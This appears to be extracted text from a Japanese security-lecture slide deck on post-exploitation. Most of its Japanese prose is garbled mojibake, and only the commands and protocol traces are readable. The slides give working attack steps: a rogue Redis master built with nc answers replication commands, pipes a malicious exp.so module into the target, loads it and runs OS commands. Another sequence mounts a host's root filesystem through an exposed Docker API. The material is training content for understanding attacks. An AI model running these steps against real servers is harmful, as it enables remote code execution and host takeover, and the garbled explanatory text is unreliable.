    w ؆қͳΫϥΠΞϯτɺαʔόͷϓϩηεΛىಈ͢ΔίϚϯυ
    w Φϓγϣϯ
    w MMJTUFONPEF GPSJOCPVOEDPOOFDUT
    w QQPSUMPDBMQPSUOVNCFS
    w LTFULFFQBMJWFPQUJPOPOTPDLFU
    root@b6d0575dafc4:/rogue# nc -klp 10000
    *1
    $4
    PING
    3FQMJDB͔Β1*/(͕
    ඈΜͰ͖͍ͯΔ
    IUUQTMJOVYEJFOFUNBOOD
    

    View Slide

64. PINGʹԠ౴ͯ͠ΈΔ
    IUUQTMJOVYEJFOFUNBOOD
    w 1*/(͸ૄ௨֬ೝͳͷͰ10/(΍0,ͳͲΛฦ͢ʢԠ౴͸Λ͚ͭΔʣ
    root@b6d0575dafc4:/rogue# nc -klp 10000
    *1
    $4
    PING
    +PONG
    *3
    $8
    REPLCONF
    $14
    listening-port
    $4
    6379
    ࣍ͷίϚϯυ͕
    ඈΜͰ͖͍ͯΔ
    

    View Slide

65. REPLCONF
    w υΩϡϝϯτʹ͸ͳ͍ͷͰιʔείʔυΛಡΉ
    w 3FQMJDB͕.BTUFSʹରͯࣗ͠෼ͷઃఆΛ఻͑ΔίϚϯυͰ͋Δ͜ͱ͕෼͔Δ
    IUUQTHJUIVCDPNSFEJTSFEJTCMPCCDGFDCFBGCGEFDDDTSDSFQMJDBUJPOD--
    

    View Slide

66. REPLCONF listening-port
    w 3FQMJDBͷ-JTUFOJOH1PSUΛ఻͑ΔΦϓγϣϯ
    w 3&1-$0/'MJTUFOJOHQPSU
    IUUQTHJUIVCDPNSFEJTSFEJTCMPCCDGFDCFBGCGEFDDDTSDSFQMJDBUJPOD--
    

    View Slide

67. REPLCONFʹԠ౴͢Δ
    w ͨͩͷ"$,ͳͷͰ0,Ͱ΋
    '00Ͱ΋ԿͰ΋ྑ͍
    w 3&1-$0/'MJTUFOJOHQPSU
    w 0,
    *3
    $8
    REPLCONF
    $14
    listening-port
    $4
    6379
    +FOO
    *5
    $8
    REPLCONF
    $4
    capa
    $3
    eof
    $4
    capa
    $6
    psync2
    ࣍ͷ3&1-$0/'͕
    ඈΜͰ͖͍ͯΔ
    

    View Slide

68. REPLCONF capa
    w 3FQMJDBͷDBQBCJMJUZΛ఻͑ΔΦϓγϣϯ
    w 3&1-$0/'DBQBFPGQTZOD
    IUUQTHJUIVCDPNSFEJTSFEJTCMPCGF⒎EBCECBDCEEFCBTSDTFSWFSI--
    

    View Slide

69. REPLCONF capaʹԠ౴͢Δ
    w ͨͩͷ"$,ͳͷͰ0,Ͱ΋
    '00Ͱ΋ԿͰ΋ྑ͍
    w 3&1-$0/'DBQBFPGDBQBQTZOD
    w 0,
    *5
    $8
    REPLCONF
    $4
    capa
    $3
    eof
    $4
    capa
    $6
    psync2
    +OK
    *3
    $5
    PSYNC
    $40
    d3d15637ec5ecf9f593ebb5f7345c3e2b2f5268
    9
    $1
    1
    14:/$͕
    ඈΜͰ͖͍ͯΔ
    

    View Slide

70. ͜͜·ͰͷྲྀΕ
    SPHVF SFEJT
    1*/(
    0,
    14:/$
    3&1-$0/'
    0,
    3&1-$0/'
    0,
    

    View Slide

71. PSYNC
    w ಉظΛ్த͔Β࠶։͢ΔͨΊͷίϚϯυ
    w .BTUFS͸P⒎TFU෼͚ͩͣΒͯࠩ͠෼͚ͩฦ͢
    w 14:/$SFQMJDBUJPOJEP⒎TFU
    w SFQMJDBUJPOJE͸จࣈ
    w 14:/$EEFDFDGGFCCGDFCG
    w ॳճͷ৔߹͸14:/$ͱ͔14:/$ ͱ͔ʹͳΔ
    *3
    $5
    PSYNC
    $40
    d3d15637ec5ecf9f593ebb5f7345c3e2b2f52689
    $1
    1
    

    View Slide

72. PSYNCʹର͢Δ߈ܸʢ1/2ʣ
    w 14:/$ʹ"$,Λฦ͢ͱ4:/$͕ඈΜͰ͘ΔͷͰϖΠϩʔυΛૹΔʢࠩ෼ѻ͍ʣ
    w ॳճͳΒ3%#ϑΝΠϧ͸ۭͳͷͰ͜ΕͰ೚ҙͷϑΝΠϧΛॻ͖ࠐΊΔ
    SPHVF SFEJT
    14:/$
    0,
    4:/$
    ೚ҙͷσʔλ
    

    View Slide

73. 4:/$ʹରͯ͠σʔλΛྲྀ͠ࠐΉ
    *3
    $5
    PSYNC
    $1
    ?
    $2
    -1
    +OK
    SYNC
    $10
    aaaaaaaaaa
    SFEJTʹೖͬͯEVNQSECΛ֬ೝ
    $ docker-compose exec redis bash
    root@6a0b1d9439a7:/data# cat dump.rdb
    aaaaaaaaaa
    ݸͷB͕ॻ͖ࠐ·Ε͍ͯΕ͹0,
    

    View Slide

74. PSYNCʹର͢Δ߈ܸʢ2/2ʣ
    w 14:/$ʹରͯ͠'6--3&4:/$Λฦ͢ʢ࣮͸ৗʹͬͪ͜Λ࢖͑͹ྑ͍ʣ
    w P⒎TFUΛແࢹͯ͠ૹΒΕ͖ͯͨσʔλͰ্ॻ͖͢Δ
    SPHVF 3FQMJDB
    14:/$
    '6--3&4:/$
    

    View Slide

75. FULLRESYNC
    w .BTUFSʹόοϑΝʔ͕ͳ͍৔߹ɺݹ͍SFQMJDBUJPOJEͷ৔߹͸'6--3&4:/$Λߦ͏
    w '6--3&4:/$SFQMJDBUJPOJEP⒎TFU
    8IFOSFQMJDBTDPOOFDUUPNBTUFST UIFZVTFUIF14:/$DPNNBOEJO
    PSEFSUPTFOEUIFJSPMENBTUFSSFQMJDBUJPO*%BOEUIFP⒎TFUTUIFZ
    QSPDFTTFETPGBS5IJTXBZUIFNBTUFSDBOTFOEKVTUUIFJODSFNFOUBM
    QBSUOFFEFE)PXFWFSJGUIFSFJTOPUFOPVHICBDLMPHJOUIFNBTUFS
    CV⒎FST PSJGUIFSFQMJDBJTSFGFSSJOHUPBOIJTUPSZ SFQMJDBUJPO*%
    XIJDIJT
    OPMPOHFSLOPXO UIBOBGVMMSFTZODISPOJ[BUJPOIBQQFOTJOUIJTDBTFUIF
    SFQMJDBXJMMHFUBGVMMDPQZPGUIFEBUBTFU GSPNTDSBUDI
    IUUQTSFEJTJPUPQJDTSFQMJDBUJPO
    

    View Slide

76. '6--3&4:/$ͰσʔλΛྲྀ͠ࠐΉ
    *3
    $5
    PSYNC
    $40
    d3d15637ec5ecf9f593ebb5f7345c3e2b2f52689
    $1
    1
    +FULLRESYNC AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0
    $10
    bbbbbbbbbb
    ઌఔಉ༷ʹSFEJTʹೖͬͯC͕ݸॻ͖ࠐ·Ε͍ͯΔ͜ͱΛ֬ೝ͢Δ
    

    View Slide

77. ݱঢ়·ͱΊʢ3FEJT3&1-*$"0'ฤʣ
    w ߈ܸର৅ͷ3FEJTʹର͠߈ܸऀ͸೚ҙͷ3FEJTίϚϯυΛൃߦՄೳ
    w 3&1-*$"0'Λ࢖ͬͯର৅αʔόΛ3FQMJDBʹઃఆ
    w ಉ࣌ʹ߈ܸऀαʔόΛ.BTUFSʹઃఆ
    w 4:/$14:/$Λ3FQMJDB͔Βൃߦͤ͞೚ҙͷϖΠϩʔυΛฦ͠EVNQSECʹ
    ޷͖ͳσʔλΛॻ͖ࠐΉ
    ·ͩ04ͷγΣϧ͕औΕ͍ͯͳ͍ʂʂ
    

    View Slide

78. ೚ҙͷϑΝΠϧॻ͖ࠐΈ͸Մೳ
    3FEJT.PEVMFT
    

    View Slide

79. 3FEJT.PEVMFT
    w ࣗ࡞ͷίϚϯυΛఆٛͰ͖Δ
    w .0%6-&-0"%ͰϞδϡʔϧΛϩʔυՄೳ
    04ίϚϯυΛ࣮ߦ͢ΔϞδϡʔϧΛ࡞Ε͹ྑ͍
    

    View Slide

80. 3FEJT.PEVMF GSPN.FUBTQMPJU
    
    w ߦҎ಺Ͱ؆୯ʹॻ͚Δ
    w ࠓճͷߨٛͰ͸.FUBTQMPJUͷίʔυΛྲྀ༻
    w ษڧͷͨΊʹࣗ࡞ͯ͠Έͯ΋ྑ͍
    IUUQTHJUIVCDPNSBQJENFUBTQMPJUGSBNFXPSLCMPCBDFEDEGFDGFECBEGEEBUBFYQMPJUTSFEJTFYQFYQD
    

    View Slide

81. ཪଆ·Ͱཧղ͢Δͷ͕ॏཁʢ࠶ܝʣ
    ͨͩར༻͢Δ͚ͩ
    FH.FUBTQMPJUΛ࣮ߦ͢Δ͚ͩ
    ཪଆ·Ͱཧղ͢Δ
    FHͲ͏͍͏ݪཧͰ߈ܸ͕੒ཱ͢Δ͔ࣗ෼Ͱࢼ͢
    ηΩϡϦςΟʹ͓͍ͯ͸͕ͬͪ͜ॏཁ
    

    View Slide

82. 3FEJT.PEVMFΛྲྀ͠ࠐΉ
    w Ұ౓៉ྷʹͯ͠΍Γ௚͢
    w Ϟδϡʔϧ͸طʹSPHVFίϯςφ಺ʹ഑ஔࡁΈʢFYQTPʣ
    root@b6d0575dafc4:/rogue# exit
    $ docker-compose down
    $ docker-compose up -d
    $ docker-compose exec rogue bash
    root@d99f653690ed:/rogue# cd /data/redis-rogue-server/
    root@d99f653690ed:/data/redis-rogue-server# ls exp.so
    exp.so
    

    View Slide

83. 3FEJT.PEVMFΛྲྀ͠ࠐΉ
    w ࠓճ͸ΠϯλϥΫςΟϒʹ΍ΒͣʹҰؾʹύΠϓͰྲྀ͠ࠐΉ
    root@efb5ffa4adf5:/rogue# redis-cli -h redis replicaof rogue 10000
    OK
    root@efb5ffa4adf5:/rogue# wc -c < exp.so
    46800
    root@efb5ffa4adf5:/rogue# ( echo "+PONG"; echo "+OK"; echo "+OK";
    echo "+OK"; echo "\$46800"; cat exp.so ; ) | nc -lk -p 10000
    

    View Slide

84. 3FEJT.PEVMFΛಡΈࠐΉ
    w EVNQSECʹϞδϡʔϧ͕ॻ͖ࠐ·Ε͍ͯΔͷͰ.0%6-&-0"%͢Δ
    w ͋ͱ͸TIFMMFYFDͰ޷͖ͳίϚϯυΛ࣮ߦՄೳ
    root@efb5ffa4adf5:/rogue# redis-cli -h redis
    redis:6379> MODULE LOAD ./dump.rdb
    OK
    redis:6379> shell.exec "id"
    "uid=999(redis) gid=999(redis) groups=999(redis)\n"
    TIFMMFYFDͷग़ྗ͸࠷ॳΰϛ͕ೖ͍ͬͯΔՄೳੑ͕͋Δ͕
    ਺ճ࣮ߦ͢Δͱ៉ྷʹͳΔʢݪҼະௐࠪʣ
    

    View Slide

85. ·ͱΊʢ3FEJT3&1-*$"0'ฤʣ
    SPHVF SFEJT
    4:/$14:/$
    .PEVMFΛฦ͢
    3&1-*$"0'Ͱ3FQMJDBʹઃఆ
    .PEVMFΛॻ͖ࠐΉ
    .0%6-&-0"%
    04ίϚϯυ࣮ߦ
    

    View Slide

86. %PDLFSฤ
    

    View Slide

87. %PDLFSͷ֓ཁ
    3&45"1*ʹΑΔૢ࡞
    %PDLFS
    $-*
    %PDLFS
    %BFNPO
    3&45"1*
    EPDLFSίϚϯυ
    S
    ίϯςφ
    

    View Slide

88. *OUFSOFU
    %PDLFS"1*͕ޡͬͯެ։͞Ε͍ͯΔ৔߹
    ίϯςφ͕࡞Γ์୊ʂʂʂ
    S
    %PDLFS"1*ͷެ։͸
    SPPUݖݶͷެ։ʹ౳͍͠
    ˞ݱࡏ͸3PPUMFTTNPEF΋͋Δ
    

    View Slide

89. ߈ܸऀʹ౎߹ͷྑ͍ίϯςφΛ࡞੒
    ΛϚ΢ϯτͯ͠͠·͏
    $ export DOCKER_HOST=tcp://x.x.x.x:2376
    $ docker run -it -v /:/mnt alpine chroot /mnt
    w %0$,&3@)045ʹ߈ܸର৅Λࢦఆ
    w ͋ͱ͸ΛNOUʹϚ΢ϯτͯ͠DISPPU͢Δ͚ͩ
    ؆୯
    

    View Slide

90. ཧղΛਂΊΔ
    %PDLFSίϚϯυΛ࢖Θͣʹ΍ͬͯΈΔ
    IUUQTLORZGIBUFOBCMPHDPNFOUSZ
    

    View Slide

91. %PDLFSίϯςφ಺͔ΒͷFTDBQF
    w QSJWJMFHFEΛ͚͍ͭͯΔ৔߹
    w EFWΛ࢖͏ํ๏
    w OPUJpDBUJPOPOSFMFBTFΛ࢖͏ํ๏
    w EPDLFSͷ੬ऑͳόʔδϣϯΛ࢖͍ͬͯΔ৔߹
    w Χʔωϧͷ੬ऑͳόʔδϣϯΛ࢖͍ͬͯΔ৔߹
    ղઆ͢Δ࣌ؒͳ͔ͬͨͷͰࢿྉࢀর
    IUUQTJCMBDLIBUDPN64"5IVSTEBZVT&EXBSET$PNQFOEJVN0G$POUBJOFS&TDBQFTVQQEG
    

    View Slide

92. ·ͱΊ
    w ৵֐ൣғΛ೺Ѳ͢ΔͨΊʹ͸߈ܸऀ͕৵ೖޙʹग़དྷΔ͜ͱΛ೺Ѳ͢Δඞཁ͕͋Δ
    w 1PTU&YQMPJUBUJPOΛֶͿ͜ͱ͸ͦͷॿ͚ͱͳΔ
    w ۩ମྫͱͯ͠ϛυϧ΢ΣΞ৵ೖޙʹ04ίϚϯυ͕࣮ߦՄೳʹͳΔ৔߹΋͋Δ
    w .Z42- 1PTUHSF42- 3FEJT %PDLFS FUD
    w ࣮ࡍʹखΛಈ͔ͯ͠ཪଆ·Ͱཧղ͢Δ͜ͱ͕ॏཁ
    ఁ࡯
    ෢ثԽ
    ഑ૹ
    ߈ܸ
    Πϯετʔϧ
    ৵ೖ֦େ
    ໨తୡ੒
    ϛυϧ΢ΣΞʹ৵ೖ Կ͕Մೳ͔ʁ
    

    View Slide